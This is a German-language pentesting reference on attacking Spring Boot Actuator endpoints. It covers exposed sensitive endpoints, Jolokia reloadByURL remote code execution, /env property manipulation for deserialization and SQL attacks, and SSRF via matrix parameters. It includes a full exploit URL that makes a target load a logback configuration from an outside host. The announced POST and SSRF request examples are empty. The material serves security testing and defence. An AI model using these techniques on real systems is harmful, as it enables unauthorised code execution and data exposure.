Spring Actuators
Spring Auth Bypass
Von https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****
Ausnutzen von Spring Boot Actuators
Überprüfen Sie den Originalbeitrag von [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]
Schlüsselpunkte:
Spring Boot Actuators registrieren Endpunkte wie
/health
,/trace
,/beans
,/env
usw. In den Versionen 1 bis 1.4 sind diese Endpunkte ohne Authentifizierung zugänglich. Ab Version 1.5 sind standardmäßig nur/health
und/info
nicht sensitiv, aber Entwickler deaktivieren diese Sicherheit oft.Bestimmte Actuator-Endpunkte können sensible Daten offenlegen oder schädliche Aktionen ermöglichen:
/dump
,/trace
,/logfile
,/shutdown
,/mappings
,/env
,/actuator/env
,/restart
und/heapdump
.In Spring Boot 1.x sind Actuators unter der Stamm-URL registriert, während sie in 2.x unter dem Basispfad
/actuator/
stehen.
Ausbeutungstechniken:
Remote Code Execution über '/jolokia':
Der
/jolokia
-Actuator-Endpunkt gibt die Jolokia-Bibliothek frei, die HTTP-Zugriff auf MBeans ermöglicht.Die Aktion
reloadByURL
kann ausgenutzt werden, um Logging-Konfigurationen von einer externen URL neu zu laden, was zu blindem XXE oder Remote Code Execution über speziell erstellte XML-Konfigurationen führen kann.Beispiel-Exploit-URL:
http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml
.
Konfigurationsänderung über '/env':
Wenn Spring Cloud Libraries vorhanden sind, ermöglicht der Endpunkt
/env
die Änderung von Umgebungseigenschaften.Eigenschaften können manipuliert werden, um Schwachstellen auszunutzen, wie die XStream-Deserialisierungsschwachstelle im Eureka-ServiceURL.
Beispiel-Exploit-POST-Anfrage:
Weitere nützliche Einstellungen:
Eigenschaften wie
spring.datasource.tomcat.validationQuery
,spring.datasource.tomcat.url
undspring.datasource.tomcat.max-active
können für verschiedene Exploits manipuliert werden, wie SQL-Injection oder Änderung von Datenbankverbindungszeichenfolgen.
Zusätzliche Informationen:
Eine umfassende Liste der Standard-Actuators finden Sie hier.
Der Endpunkt
/env
in Spring Boot 2.x verwendet JSON-Format für die Eigenschaftsänderung, aber das allgemeine Konzept bleibt dasselbe.
Verwandte Themen:
Env + H2 RCE:
Details zur Ausnutzung der Kombination aus
/env
-Endpunkt und H2-Datenbank finden Sie hier.
SSRF auf Spring Boot durch falsche Interpretation des Pfadnamens:
Die Behandlung von Matrixparametern (
;
) im HTTP-Pfadnamen des Spring-Frameworks kann für Server-seitige Anfragenfälschung (SSRF) ausgenutzt werden.Beispiel-Exploit-Anfrage:
Last updated